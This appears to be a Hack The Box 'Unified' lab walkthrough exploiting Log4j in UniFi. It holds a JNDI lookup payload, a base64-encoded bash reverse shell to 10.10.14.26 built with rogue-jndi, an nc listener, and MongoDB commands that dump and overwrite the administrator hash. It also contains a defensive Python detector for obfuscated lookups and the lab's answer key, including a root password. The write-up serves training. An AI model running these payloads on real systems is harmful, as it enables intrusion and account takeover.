HTB - Unified
Log4j CVE-2021-44228
1. Port scan finds 22, 6789, 8080 and 8443 open.
2. Visiting port 8080 redirects to port 8443. The web page on that port reveals the UniFi CMS; searching for exploits for this CMS shows that version 6.4.54 is affected by the Log4j vulnerability.
3. Construct the Log4j lookup string, then capture and replay the request to verify whether the Log4j vulnerability exists (payload).
In the captured request, modify the remember field to add the following:
${jndi:ldap://10.10.14.26/whatever}
LDAP (Lightweight Directory Access Protocol) uses port 389 by default. If the vulnerability exists, sending the payload makes the target send a packet to port 389 on our machine.
4. tcpdump
Listen for traffic on port 389. The captured data shows the target host connecting from port 49190 to our LDAP port, which proves the vulnerability exists.
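A defender-side check for the lookup string from step 3, added here as an example and not part of the original writeup: it canonicalizes Log4j wrapper lookups (lower:, upper:, and the :-default form) and then flags JNDI lookups in constructed sample request-log lines, so a request like the one above is caught whether or not the lookup is wrapped.

```python
import re

# Constructed sample request log lines, not taken from the original writeup. Line 1
# carries the lookup string the writeup places in the "remember" field; line 2 is the
# same lookup wrapped in lower: lookups, which a plain substring match would miss.
SAMPLE_LOG = [
    '10.10.14.26 POST /api/login {"username":"a","password":"b","remember":"${jndi:ldap://10.10.14.26/whatever}"}',
    '10.10.14.26 POST /api/login {"username":"a","password":"b","remember":"${${lower:j}ndi:${lower:l}dap://10.10.14.26/whatever}"}',
    '10.10.14.30 POST /api/login {"username":"admin","password":"x","remember":"true"}',
]

# Innermost ${...} lookup: the body contains no nested "$", "{" or "}".
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# After normalization, a JNDI lookup naming one of the resolvable protocols.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:", re.I)

def _resolve(m):
    """Evaluate one wrapper lookup the way Log4j 2 would; leave anything else intact."""
    body = m.group(1)
    if body[:6].lower() == "lower:":
        return body[6:].lower()
    if body[:6].lower() == "upper:":
        return body[6:].upper()
    if ":-" in body:                      # ${prefix:key:-default} evaluates to the default
        return body.rsplit(":-", 1)[1]
    return m.group(0)                     # not a wrapper (e.g. ${jndi:...}): keep as is

def normalize(text):
    """Repeatedly collapse wrapper lookups until the string stops changing."""
    prev = None
    while prev != text:
        prev, text = text, LOOKUP.sub(_resolve, text)
    return text

def scan(lines):
    """Return (line_number, protocol, canonical lookup) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        canon = normalize(line)
        m = JNDI.search(canon)
        if m:
            end = canon.find("}", m.end())
            lookup = canon[m.start():end + 1] if end != -1 else canon[m.start():]
            hits.append((n, m.group(1).lower(), lookup))
    return hits

if __name__ == "__main__":
    for n, proto, lookup in scan(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup via {proto}: {lookup}")
```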
5. Log4j exploitation
Tools to prepare:
1. openjdk-11-jdk
sudo apt-get install openjdk-11-jdk -y
2. Maven
sudo apt-get install maven -y
3. Build with Maven
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
mvn package
rogue-jndi: starts a local LDAP server that accepts connections from other servers and can execute code.
5.1 Reverse shell
echo 'bash -c bash -i >&/dev/tcp/10.10.14.26/10086 0>&1' | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMjYvMTAwODYgMD4mMQo=
5.2 Build the payload
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMjYvMTAwODYgMD4mMQo=}|{base64,-d}|{bash,-i}" --hostname "10.10.14.26"
java -jar RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMjYvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.14.26"
5.3 Send the payload with Burp; the returned request yields a shell.
5.4 nc -lvnp 4444
Listen for the reverse shell and obtain user privileges.
6. Privilege escalation
Check the MongoDB port: ps aux | grep mongo
(UniFi's middleware uses MongoDB by default, so the database contents can be modified through the remote code execution.)
MongoDB stores its content as JSON; once connected remotely, the database contents can be modified.
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
The default MongoDB database for UniFi is ace; query ace with the statement above.
The query reveals the administrator account and its hashed password.
7. Identify the hash type: hashid, after escaping with single quotes, identifies it as SHA-512.
8. Replace the administrator hash and log into the backend
Generate a SHA-512 hash and replace the administrator's hash in MongoDB.
Replace it with a Mongo NoSQL statement:
mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$bddGuhm3UqXNoZ9p$We07yFxehCTxPqOKpKsGcu09nsS5fkauC1cD8dgQ3sjuKColLuPgia5ZjBTK0M17qe7yn6Fk7srqhDVZMfGZW1"}})'
9. After logging into the backend, we find that root has SSH enabled and the password is visible.
10. Get flag
TASK
1.Which are the first four open ports?
22,6789,8080,8443
2.What is the title of the software that is running on port 8443?
unifi network
3.What is the version of the software that is running?
6.4.54
4.What is the CVE for the identified vulnerability?
CVE-2021-44228
5.What protocol does JNDI leverage in the injection?
ldap
6.What tool do we use to intercept the traffic, indicating the attack was successful?
tcpdump
7.What port do we need to inspect intercepted traffic for?
389
8.What port is the MongoDB service running on?
27117
9.What is the default database name for UniFi applications?
ace
10.What is the function we use to enumerate users within the database in MongoDB?
db.admin.find()
11.What is the function we use to update users within the database in MongoDB?
db.admin.update()
12.What is the password for the root user?
NotACrackablePassword4U2022